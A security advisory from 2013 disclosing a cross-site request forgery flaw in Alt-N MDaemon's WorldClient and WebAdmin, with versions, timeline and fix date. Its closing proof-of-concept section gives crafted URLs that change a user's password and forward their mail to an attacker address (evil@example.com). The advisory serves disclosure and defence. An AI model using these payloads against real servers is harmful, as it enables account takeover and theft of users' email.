===================================================================================== Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability ===================================================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: Cross-Site Request Forgery Remote: Yes Local: No Discovered by: QSecure and Demetris Papapetrou References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.html Discovered: 25/07/2012 Reported: 19/12/2012 Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html) Disclosed: 18/02/2013 VULNERABILITY DESCRIPTION: ========================== Alt-N WorldClient and WebAdmin applications are prone to a cross-site request-forgery vulnerability. It should be noted that partial protection is provided by the Session parameter, but this alone cannot be considered as an adequate protection mechanism. An attacker can exploit this issue to perform different actions on the affected application without the user's consent. For example, the attacker can change the user's password, forward a copy of the user's emails to a different email account, retrieve his/her address book, send email messages to other users/email addresses and/or perform other similar tasks. Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected. PoC Exploit: ============ Change Password: http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n Enable Forwarding: http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com
